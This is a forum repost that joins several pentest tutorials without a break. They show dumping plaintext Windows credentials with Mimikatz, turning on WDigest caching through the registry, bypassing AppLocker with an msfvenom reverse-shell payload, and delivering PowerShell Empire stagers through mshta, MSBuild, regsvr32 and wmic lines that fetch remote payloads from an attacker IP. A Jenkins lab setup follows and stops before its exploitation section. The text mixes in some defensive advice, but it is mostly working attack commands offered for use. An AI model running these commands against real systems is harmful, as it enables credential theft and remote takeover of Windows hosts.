05-14-2020, 11:24 AM
| 0 | 0 | ||
Table of Contents
- Introduction
- System impacted
- System impacted
- Demonstration on Windows 7
- Disable WDigest (defending against mimikatz)
- Disable WDigest (defending against mimikatz)
- Demonstration on Windows 10
- Enable WDigest in Windows 10
- Enable WDigest via the registry key
- Enable WDigest in Windows 10
WDigest.dll was introduced in the Windows XP operating system. in Windows XP, Microsoft added support for a protocol known as WDigest. The WDigest protocol is used for clients to send clear text credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications based on RFC 2617 and 2831. When the WDigest authentication protocol is enabled, clear text password is stored, where it can be at risk of theft.
System Impacted
The problem with WDigest is that it stores passwords in memory in clear-text and it can be extracted by using MIMIKATZ. The following OS’s are impacted: Windows 7, Windows 8, Windows 8.1, Windows Server 2008, Windows Server 2008R2, and Windows Server 2012.
Demonstration on windows 7
An attacker with administrator privileges can steal credentials from damaged system memory. Memory credentials are stored in plain text and in various hash formats. First, we will demonstrate how we can see the password of Windows 7 using MIMIKATZ tool as shown in the image below as it has shown the password in the clear text. And for this, we will following commands in MIMIKATZ tool
privilege::debug
sekurlsa::wdigest
1
2
privilege::debug
sekurlsa::wdigest
![[Image: 1.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-sE4_yzI9VUc/XGWdktezWrI/AAAAAAAAcmI/cuPEb408p28tU2W53b6-6IGt_sTU9aRXwCLcBGAs/s1600/1.png?w=687)
Now as you can observe that is has shown you the password in clear text. We can also do this by taking the meterpreter of the target system and then using MIMIKATZ in Kali. Here you will see that it has also shown us the password of the compromised system.
![[Image: 2.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-Gnbea-gtBj8/XGWdl9ojlEI/AAAAAAAAcmY/v36cIafhSYYg7r4kwpGG-jx5ZrQME2_EACLcBGAs/s1600/2.png?w=687)
Disable WDigest (Defending against Mimikatz)
Now as we know that it is a security threat; so now we will get to know how we can remove this from our system and for this a registry change is required to make to hide our password. For this, we will first open the regedit and then go to WDigest option using the following path
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
![[Image: 3.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-FNkm4UO6yhI/XGWdmem99MI/AAAAAAAAcmc/hnX1zBFgabkxP2fTe5xytUp4nrAUOTCLwCLcBGAs/s1600/3.png?w=687)
Here you need to open the security packages and you will see WDigest with the other options as shown in the image below
![[Image: 4.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-DcB6Cge9EwA/XGWdmRykRxI/AAAAAAAAcmg/KMiQZS-KK4gCNp8hC5vTqULYbRX_Md0mgCLcBGAs/s1600/4.png?w=687)
Great! You have found that. Now simply you need to remove Wdigest from here so that nobody can see the password using MIMIKATZ tool.
![[Image: 5.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-4N4RAnlsW8g/XGWdmvwrBRI/AAAAAAAAcmk/MAJ4JtlHQjweziHxhmDfIX4wpraxDwA5ACLcBGAs/s1600/5.png?w=687)
Now after making these changes, we need to update the group policy and reboot the system. After doing so we will again use MIMIKATZ tool to see the change now. So we will use the same commands which we have used earlier to get the password and this time it will show us the password NULL as shown in the image.
![[Image: 6.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-_2llDO6Ck9g/XGWdnc6lMdI/AAAAAAAAcmo/x-rm7BuwdRMSotFqEATcgIudTNhlzNAbACLcBGAs/s1600/6.png?w=687)
Great! We have successfully hidden the password. Now, if somebody has taken the meterpreter of the Windows 7 and if the attacker tries this in kali using MIMIKATZ tool there. Even then the attacker is not able to get the password of the compromised system as shown in the image below
![[Image: 7.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-TjjPP_hGP_w/XGWdns6MO7I/AAAAAAAAcms/io9sXWaHM9kzc7tkkM9iXB5tZ3NMI-YhgCLcBGAs/s1600/7.png?w=687)
Demonstration on Windows 10
In the same way, we will try this method in Windows 10 and as we know that in Windows 10 it is disabled by default. We can verify this by using the MIMIKATZ tool there.
![[Image: 8.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-XDBLlqaYu1Q/XGWdoIRBavI/AAAAAAAAcmw/lpIoy_VJj2wGzk7urHNXL3qthXgjGh5MQCLcBGAs/s1600/8.png?w=687)
Enable WDigest in Windows 10
Yes; as we have verified that the Wdigest option is disabled by default. Now we will learn how we can enable Wdigest in Windows 10. For this first, we need to take meterpreter of the target system and then we need to take the admin access of the system and then we need to use the exploit to enable Wdigest in the target system with the help of the following module.
On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider’s Registry key. Any subsequent logins will allow mimikatz to recover the plain text passwords from the system’s memory.
use post/windows/manage/wdigest_caching
msf post(windows/manage/wdigest_caching) > set session 2
msf post(windows/manage/wdigest_caching) > exploit
1
2
3
use post/windows/manage/wdigest_caching
msf post(windows/manage/wdigest_caching) > set session 2
msf post(windows/manage/wdigest_caching) > exploit
![[Image: 9.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-sNgeMG036AM/XGWdoN2cy5I/AAAAAAAAcm0/qfT7CObdpfgGMlFLa0Pmm07j0fCkZyQEQCLcBGAs/s1600/9.png?w=687)
After making the changes we will check if the Wdigest option is enabled. For this, we will again use MIMIKATZ tool here and we will observe that we have found the password of the victim’s P.C
![[Image: 10.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-iqRGO86-DK0/XGWdk5wY1RI/AAAAAAAAcmM/YQf5S-g_6hwangDPRYEAi53v7Vw_YTAywCLcBGAs/s1600/10.png?w=687)
We can do this too by taking the meterpreter of the system using MIMIKATZ tool there.
![[Image: 11.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-b7IJPjyLqYs/XGWdkjTi3bI/AAAAAAAAcmE/FWAmOKmTdRQvZLdgY9TTJtbZEx-NPj8pwCLcBGAs/s1600/11.png?w=687)
Enable Wdigest via a registry key
There is one more way to see the password. The second method to enable WDigest is by taking the shell of the compromised system. Now run the following command to enable the wdigest.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
1
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
![[Image: 12.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-_jS_AiN6LAQ/XGWdlehqHDI/AAAAAAAAcmQ/0wtT6J2ecVUfhxrf8JXpJFbZlREs6KTjQCLcBGAs/s1600/12.png?w=687)
After you get the shell; you need to run Mimikatz tool here and we will use the same commands to see the password. And you will observe that we have got the password.
![[Image: 13.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-JohcUJItv8Y/XGWdlmyx1II/AAAAAAAAcmU/IrqIRCzY2owg4aBTcGRYA03VlWV0DWzPgCLcBGAs/s1600/13.png?w=687)
Excellent we have done this with this method also. And we know that how to see the password in Windows 10 and how to enable and disable that.
Finding loopholes is very important when you are the part of a pen-testing team. Because such loopholes are the source of hacking as the attacker will actively look for them. So in order to patch such loopholes, you must know how to and where to find them. One of such loopholes is something known as weak folders in windows.
To secure windows, there are multiple security policies provided by Microsoft. One of such policies does not allow an exe file to execute which means a malicious exe file that can be sent by an attacker will not work in the targeted PC. To apply such policy, you need to go into the local security policy of Windows > Applocker > Executable Rules > and then apply the policy. As you can see in the image below the default rule has been set.
![[Image: 1.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-RbKbg59FJlo/XFpaOIYB99I/AAAAAAAAclM/UIRvXBGUSdIQJjcLyAnLer4TF6DwP0ZnACLcBGAs/s1600/1.png?w=687)
Now, if you try to run any given .exe file, it will not run. Here, I have tried to execute putty.exe file but as you can see in the image below it does not run.
![[Image: 2.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-oNIU0G3bzNg/XFpaOLtWcVI/AAAAAAAAclU/MSi3-rQfWfEFvs2pOFHZe1sijG4IxkSxACLcBGAs/s1600/2.png?w=687)
The loophole to this policy is that there still few folders, which despite such activated security policies, has the write and read permissions and such files will execute from these folders. If I run the same exe i.e. putty.exe in the C drive > windows > tasks folder then it will be executed as shown in the image below.
![[Image: 3.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-uVIKvWbglwM/XFpaONjFD-I/AAAAAAAAclQ/HSSKiqO94iMPIJH-ygbkG4LLCTjbm70HgCLcBGAs/s1600/3.png?w=687)
To check which folders have read and write permission, you can use the following command:
accesschk64.exe "Users" c:/Windows -w
1
accesschk64.exe "Users" c:/Windows -w
Using this command, you can see in the following image that everywhere the access is denied except for the temp, task and tracing folders.
![[Image: 4.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-jAGXlplQqq4/XFpaPNJTTNI/AAAAAAAAclY/VBCk2bUKYHUEQJI5gxEKVqnpuiq4GO2XACLcBGAs/s1600/4.png?w=687)
Now let’s experiment with a malware which we will create using msfvenom for the targeted PC with the following command:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f exe > shell.exe
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f exe > shell.exe
![[Image: 5.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-_y-aazykwgk/XFpaPG1fv3I/AAAAAAAAclc/OXGie4GKzwUMnL88RKbf9keLSBsROInowCLcBGAs/s1600/5.png?w=687)
When you execute the above malware in the victims’ PC, it will not run due to the applicable security policies.
![[Image: 6.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-dM69InXPrCU/XFpaPlEAPJI/AAAAAAAAclg/-ss9UszoAW4nx2EI0Tnfl5LSZSpnuVOJACLcBGAs/s1600/6.png?w=687)
But, if using the loophole, you execute the file from the tasks folder as shown in the image below:
![[Image: 7.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-w-i9UMuIH_Q/XFpaP0mEAcI/AAAAAAAAclk/PYbgNVYupEoB1EOaB_xNsCvMp6sfIT9bACLcBGAs/s1600/7.png?w=687)
Then, you will have your meterpreter session as desired.
![[Image: 8.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-LjCCorKCXvA/XFpaQFNcoAI/AAAAAAAAclo/nEtJSy0tcqUD8Hu5kc_xXSOu7QpI_X7AgCLcBGAs/s1600/8.png?w=687)
So, while providing security or attacking you must know everything about the targeted machine so that you can use their security against them or provide even better security by patching such loopholes.
This is our second post in the article series ‘PowerShell Empire’. In this article, we will cover all the exploits that lead to windows exploitation with the empire. To read our first post on empire series, which gives a basic guide to navigate your way through empire, click
[To see content please register here]
.Table of Content:
- Exploiting through HTA
- Exploiting through MSBuild.exe
- Exploiting through regsvr32
- XSL exploit
- Exploiting through a visual basic script
- BAT exploit
- Multi_launcher exploit
This attack helps us to exploit windows through .hta. When .hta file is run via mshta.exe it executes as .exe file with similar functionality which lets us hack our way through. To know more about this attack please click
[To see content please register here]
.To run type
./empire
1
./empire
According to the workflow, firstly, we have to create a listener to listen to our local machine. Type the following command:
listeners
1
listeners
After running the above command, it will say that “no listeners are currently active” but don’t worry, we are into the listener interface now. So in this listener interface, type :
uselistener http
set Host
[To see content please register here]
execute1
2
3
uselistener http
set Host
[To see content please register here]
executeNow that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type :
usestager windows/hta
set Listener http
set OutFile /root/1.hta
execute
1
2
3
4
usestager windows/hta
set Listener http
set OutFile /root/1.hta
execute
![[Image: 1.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-ttgWf35VDIU/XFhtAtB0ajI/AAAAAAAAcjU/E8B8CyR588c5VByXF4kWAlSHwiRsTVyPwCEwYBhgL/s1600/1.png?w=687)
Running the above commands will create a .hta file to be used as malware. Start the python server using the following command, in order to share our .hta file:
python -m SimpleHTTPServer 8080
1
python -m SimpleHTTPServer 8080
![[Image: 2.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-CXxYCBFeWDQ/XFhtDRcCqmI/AAAAAAAAckA/P-Shf7uDI3wnAOdAHFi-r7Vrrs8mVFCewCEwYBhgL/s1600/2.png?w=687)
As the python server is up and running, type the following command in victims’ command prompt to execute our malicious file:
mshta.exe
[To see content please register here]
1
mshta.exe
[To see content please register here]
![[Image: 3.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-_7JOtpNoUCA/XFhtEBMoUdI/AAAAAAAAckM/-oF4Zpo3DYI-paNszlPuYe1aLCK0j669wCEwYBhgL/s1600/3.png?w=687)
The moment above command is executed you will have your session, to access the session type :
interact XDGM6HLE
sysinfo
1
2
interact XDGM6HLE
sysinfo
![[Image: 4.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-Vqbyyczf74s/XFhtEtvNemI/AAAAAAAAckQ/m-QYMX-QK_saHkNfiL2lOSXcQMFs7sWMACEwYBhgL/s1600/4.png?w=687)
Exploiting through MSBuild.exe
Our next exploit is via MSBuild.exe, which will let you have a remote session of windows using an XML file. To know in details about this attack please click
[To see content please register here]
. And to use this exploit type:listeners
uselistener http
set Host
[To see content please register here]
execute1
2
3
4
listeners
uselistener http
set Host
[To see content please register here]
executeThis creates a listener, type ‘back’ to go in listener interface to create an exploit. For this, type :
usestager windows/launcher_xml
set Listener http
execute
1
2
3
usestager windows/launcher_xml
set Listener http
execute
![[Image: 5.1.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-bdszT-Wal5Q/XFhtE1ujg0I/AAAAAAAAckU/7DofnGuY1gYDqKKVCNHkyUmE5x_gvWVsQCEwYBhgL/s1600/5.1.png?w=687)
Now, an xml file is created in /tmp. Copy this file in victims’ PC (inside Microsoft.NET\Framework\v4.0.30319\) and run it typing combination of following commands:
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml
1
2
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml
![[Image: 5.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-QgsdsE2dbXs/XFhtE-YrBQI/AAAAAAAAckY/9N_YbDKs52oLx9exQY7Bhg5wC-qxG1V0wCEwYBhgL/s1600/5.png?w=687)
So, this way you will have your session, to access the said session type :
interact A8H14C7L
sysinfo
1
2
interact A8H14C7L
sysinfo
![[Image: 6.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-5OoftvoYMDQ/XFhtFblAqQI/AAAAAAAAckc/qZPjPUZqCO0-IfAYQmpM5rx6BmF_jPErwCEwYBhgL/s1600/6.png?w=687)
Exploiting through regsvr32
Our next method is exploiting through regsvr32. To know in detail about this attack, do click
[To see content please register here]
. As always, we have to create a listener first to listen to our local machine. Type the following command:listeners
uselistener http
set Host
[To see content please register here]
execute1
2
3
4
listeners
uselistener http
set Host
[To see content please register here]
executeNow that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type:
usestager windows/launcher_sct
set Listener http
execute
1
2
3
usestager windows/launcher_sct
set Listener http
execute
![[Image: 7.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-QYx-9v5dnH0/XFhtFdt52vI/AAAAAAAAckg/3r3lhFM3Egwe8dwB_gXQFsoVZgJYYQKYACEwYBhgL/s1600/7.png?w=687)
This will create a .sct file in /tmp. Share this file to victim’s PC using the python server and then run this file in a run window of victims’ PC by typing the following command:
regsvr32.exe /u /n /s /i:http//192.168.1.107:8080/launcher.sct scrobj.dll
1
regsvr32.exe /u /n /s /i:http//192.168.1.107:8080/launcher.sct scrobj.dll
![[Image: 8.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-cWBJcuNkDbY/XFhtF5BtFsI/AAAAAAAAckk/heG4oQFqnyc-QBst90yLV27na7LD4u49wCEwYBhgL/s1600/8.png?w=687)
Thus, you will have an active session. To access the session type:
interact <session name>
sysinfo
1
2
interact <session name>
sysinfo
![[Image: 9.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-q93_nOhr8Tc/XFhtGHXXOJI/AAAAAAAAcko/WhuQypbgUw0qYkceLFaZMYBq8oP2yaXNgCEwYBhgL/s1600/9.png?w=687)
Exploiting through XSL
XSL is a language will help you format data, this also describes how web server will interact with using XML. Our next method of attack with empire is by exploiting .xsl file. For this method lets activate our listener first by typing :
listeners
uselistener http
set Host
[To see content please register here]
execute1
2
3
4
listeners
uselistener http
set Host
[To see content please register here]
executeAs the listener is up and running, create your exploit :
usestager windows/launcher_xsl
set Listener http
execute
1
2
3
usestager windows/launcher_xsl
set Listener http
execute
![[Image: 10.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-dJmRILsulvU/XFhtA-rGNbI/AAAAAAAAcjc/d9aJWQbMjpAw2izRN9jRKzjIzGisDcX6gCEwYBhgL/s1600/10.png?w=687)
This way .xsl file is created. Now run the python server from the folder where the .xsl file is created as shown in the image below :
cd /tmp
python -m SimpleHTTPServer 8080
1
2
cd /tmp
python -m SimpleHTTPServer 8080
![[Image: 11.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-FSXxeezF3rY/XFhtA80ZBYI/AAAAAAAAcjY/a73_TBsm2espvvf_-hzgT7ZP81Z_FKhtQCEwYBhgL/s1600/11.png?w=687)
Now execute the following command in the command prompt of your victim:
wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"
1
wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"
![[Image: 12.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-W-ousyDWgig/XFhtBIMTwCI/AAAAAAAAcjg/pl1JAnLSRDkTQ6PWNckopnLR8VENoYxTQCEwYBhgL/s1600/12.png?w=687)
Running above will give a session, to access the session type :
interact <session name>
sysinfo
1
2
interact <session name>
sysinfo
![[Image: 13.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-ksZL_anTK_I/XFhtBhV725I/AAAAAAAAcjk/BMSYkEMk2Vgd_2iGTQN0IAwNQgpPNFwCgCEwYBhgL/s1600/13.png?w=687)
Exploiting through Visual Basic script
Our next method is to create a malicious VBS file and exploiting our victim through it. Like always, let’s create a listener first.
listeners
uselistener http
set Host
[To see content please register here]
execute1
2
3
4
listeners
uselistener http
set Host
[To see content please register here]
executeNow, to create our malicious .vbs file type :
usestager windows/launcher_vbs
set Listener http
execute
1
2
3
usestager windows/launcher_vbs
set Listener http
execute
![[Image: 14.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-4ymFBLP833Q/XFhtBj8DkOI/AAAAAAAAcjo/fzYLDhzcMes7M1JsPp3xsHjXYbfs-7qDwCEwYBhgL/s1600/14.png?w=687)
Next step is to start the python server by typing:
python -m SimpleHTTPServer 8080
1
python -m SimpleHTTPServer 8080
![[Image: 15.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-cKWvX9eH04s/XFhtCPTltVI/AAAAAAAAcjs/YIfF1XNzd80_RthkDnpsEuiODSch2qM0gCEwYBhgL/s1600/15.png?w=687)
Once the .vbs file is shared through the python server and executed in the victim’s PC you will have your session and just like before to access the session type :
interact <session name>
sysinfo
1
2
interact <session name>
sysinfo
![[Image: 16.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-beXdVl8FJO4/XFhtCRfCv4I/AAAAAAAAcjw/j_ApfbR3rawPuKBQeVSwUTDA7HRxPoeXACEwYBhgL/s1600/16.png?w=687)
Exploiting through a bat file
In this method, we will exploit through a .bat file. Like our previous exploits, this time too, let’s create a listener. For this, type:
listeners
uselistener http
set Host
[To see content please register here]
executeback
1
2
3
4
5
listeners
uselistener http
set Host
[To see content please register here]
executeback
The above commands will create a listener for you. Let’s create our .bat file using the following command :
usestager windows/launcher_bat
use Listener http
set OutFile /root/1.bat
execute
1
2
3
4
usestager windows/launcher_bat
use Listener http
set OutFile /root/1.bat
execute
![[Image: 17.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-PuBDS87gDVY/XFhtCsf9HoI/AAAAAAAAcj0/6K75-pqf8cEVXEDEpA-Hz_YvExwjQRPmQCEwYBhgL/s1600/17.png?w=687)
As shown, the above commands will create a .bat file. Start up the python server by using the following command to allow you to share your .bat file on your victim’s pc.
python -m SimpleHTTPServer 8080
1
python -m SimpleHTTPServer 8080
![[Image: 18.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-DmFd3A2BrF0/XFhtC54mzQI/AAAAAAAAcj4/-dSWenZ1s3knJ4r4zQnpi6rp-JZ-pjEFACEwYBhgL/s1600/18.png?w=687)
Once you run the .bat file, a session will activate. To access the session type:
interact <session name>
sysinfo
1
2
interact <session name>
sysinfo
![[Image: 19.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-9tiYB0qkGNA/XFhtDH3cqFI/AAAAAAAAcj8/QLcUlMGop8UYpKYfCL8ECx-FgcO0_QaxwCEwYBhgL/s1600/19.png?w=687)
Multi_launcher
This is our last method of this post. It can be used on various platforms such as Windows, Linux, etc. again, even for this method, create a listener:
listeners
uselistener http
set Host
[To see content please register here]
execute1
2
3
4
listeners
uselistener http
set Host
[To see content please register here]
executeThen type following commands for creating your malicious file:
usestager multi/launcher
set Listener http
execute
1
2
3
usestager multi/launcher
set Listener http
execute
![[Image: 20.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-GkRV66Vub-4/XFhtDnJRV9I/AAAAAAAAckE/OkZAjcW4-6oiwsJR4kH1X_EzQ0rEhUkSwCEwYBhgL/s1600/20.png?w=687)
Once you hit enter after the above commands, it will give you a code. Copy this code and paste it in the command prompt of the victim and hit enter. As soon as you hit enter, you will have activated a session. To access the session, type:
interact <session name>
sysinfo
1
2
interact <session name>
sysinfo
![[Image: 21.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-hdKjczGkwjg/XFhtDxLpZHI/AAAAAAAAckI/XBJm5npu-ycurrUxCV7X813uo0jygnxWACEwYBhgL/s1600/21.png?w=687)
Conclusion
The above were the methods that you can use to exploit windows using different vulnerabilities. Using this framework is an addition to your pen-testing skills after Metasploit. Enjoy!
Hey! You all know that we have performed so many CTF challenges and we got to know about Jenkins there. So let’s know about Jenkins better. For this, we are here with the new challenges which you will face while performing CTF challenges. To do it in an easier way we are here with a new article. So let’s do it.
Table of Content
Introduction of Jenkins
Lab setup
- Install Java
- Import the GPG keys
- Add the Jenkins repository
- Install Jenkins
- Setup Jenkins
Exploiting Groovy Script
Introduction of Jenkins
Jenkins is an open source automation server written in Java that offers a simple way to set up a continuous CI / CD pipeline. It supports version control tools, including AccuRev, CVS, Subversion, Git, Mercurial, Perforce, TD/OMS, ClearCase, and RTC, and can execute Apache Ant, Apache Maven, and sbt based projects as well as arbitrary shell scripts and Windows batch commands. The creator of Jenkins is Kohsuke Kawaguch. Jenkins achieves Continuous Integration with the help of plugins. Plugins allow the integration of Various DevOps stages. If you want to integrate a particular tool, you need to install the plugins for that tool. For example Git, Maven 2 project, Amazon EC2, HTML publisher etc.
Lab setup
Install Java
Now we need to install Jenkins and for this, it is mandatory that you are logged in from sudo user or root. Because Jenkins is a Java application, installing Java is the first step. Update the package index and install the OpenJDK Java 8 package using the following commands:
sudo apt update
sudo apt install openjdk-8-jdk
1
2
sudo apt update
sudo apt install openjdk-8-jdk
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-EXZVdtuPnI4/XFWIgX_6yAI/AAAAAAAAciI/2XfcpE8XW-EwQdSKmXsTx0JG0HctzFwFACLcBGAs/s1600/1.png?w=687&ssl=1)
Import the GPG keys
wget -q -O -
[To see content please register here]
| sudo apt-key add -1
wget -q -O -
[To see content please register here]
| sudo apt-key add -![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-82OJznxaeDo/XFWIhLNB1ZI/AAAAAAAAciQ/oF0Kgu_b4fIz6czXYmTZ54RQexXFKsPVACLcBGAs/s1600/2.png?w=687&ssl=1)
Install Jenkins
When the key is added, the system returns all right. Next, add the Debian package repository to the source list of the server:
sudo sh -c 'echo deb
[To see content please register here]
binary/ > /etc/apt/sources.list.d/jenkins.list'sudo apt update
1
2
sudo sh -c 'echo deb
[To see content please register here]
binary/ > /etc/apt/sources.list.d/jenkins.list'sudo apt update
The Jenkins version with the default Ubuntu packages is often behind the project’s latest version. You can use project-maintained packages to install Jenkins to take advantage of the latest fixes and features. Now open the kali terminal and install Jenkins from the given link below-
sudo apt install jenkins
sudo ufw allow 8080
1
2
sudo apt install jenkins
sudo ufw allow 8080
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-ZvWtk_WZO0s/XFWIhUlsZqI/AAAAAAAAciU/ykx6bZFK7pAdEmv_wUxKVwtm9KFXSq_0wCLcBGAs/s1600/3.png?w=687&ssl=1)
You can use its status command to check that Jenkins has successfully started.
systemctl status jenkins
1
systemctl status jenkins
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-b5Bs3sHOQYE/XFWIhgIqGFI/AAAAAAAAciY/x9x9ECSm_EkFuGoXCw3TkjFr0jwdWrCHQCLcBGAs/s1600/4.png?w=687&ssl=1)
Visit Jenkins on its default port 8080 to set up your installation using your server domain name or IP address: http://your server IP or domain:8080
You should see the Unlock Jenkins screen displaying the location of the initial password:
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-B7rcQmCtcww/XFWIh7YMwnI/AAAAAAAAcic/Tmw6dyqcldAIsODbgJDz8U9uh9dhvu_4wCLcBGAs/s1600/5.png?w=687&ssl=1)
In the terminal window, you need to use the cat command to display the password:
Copy the password from your terminal
sudo cat /var/lib/jenkins/secrets/initialAdminPassword
1
sudo cat /var/lib/jenkins/secrets/initialAdminPassword
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-_Y1gjOqBbWM/XFWIh93wb7I/AAAAAAAAcig/BMVfhF1CLBgn7fXodjQlsBLR1zMg-7GwgCLcBGAs/s1600/6.png?w=687&ssl=1)
Copy the password from your terminal and paste it into the Administrator password field and click Continue.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-ACwHDYcbaVA/XFWIiU9jtjI/AAAAAAAAcik/kSiI5-NHjIMqesA5-l1VIYcUrWq08TsOQCLcBGAs/s1600/7.png?w=687&ssl=1)
On the next page, you will be asked if you want to install suggested plugins or if you want to select specific plugins. Click the Install suggested plugins box and start the process of installation plugin instantly.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-oCQnOK9iWFA/XFWIi3MnQ_I/AAAAAAAAcio/rc-KTWrvQz8trfYgInODLDm8xdtE7bpwgCLcBGAs/s1600/8.png?w=687&ssl=1)
In my case, it took so much time to get all plugin installed successfully.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-IYWeEuKtUHM/XFWIjFUECBI/AAAAAAAAcis/AnjFAic5Q2wG3PBtLqT8xRBQOzReVbDRACLcBGAs/s1600/9.png?w=687&ssl=1)
Once the installation is completed, you will get another page to create First Admin user account, fill the all essential details and click on “Save and Continue”.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-vI__S17_M0o/XFWIfzRh-VI/AAAAAAAAciA/ZyrRg98Uly0OFDgp-ssoNmC09wzt32TtQCLcBGAs/s1600/10.png?w=687&ssl=1)
You will see a confirmation page that “Jenkins is ready”. To visit Jenkins main dashboard, click Start using Jenkins Click Save and Finish after confirming the corresponding information.
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-6tOUKFgIgIs/XFWIgDsE8BI/AAAAAAAAciE/mvsfnti2ob8kEtew9uW_Q-JRDcGNFSI4gCLcBGAs/s1600/11.png?w=687&ssl=1)
That’s wonderful! You have successfully installed Jenkins on your system.
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-pd-uis1ys4I/XFWIgspFzkI/AAAAAAAAciM/2n_r9XDMy80uAkNiNQGnJHrV54Z67ep2wCLcBGAs/s1600/12.png?w=687&ssl=1)
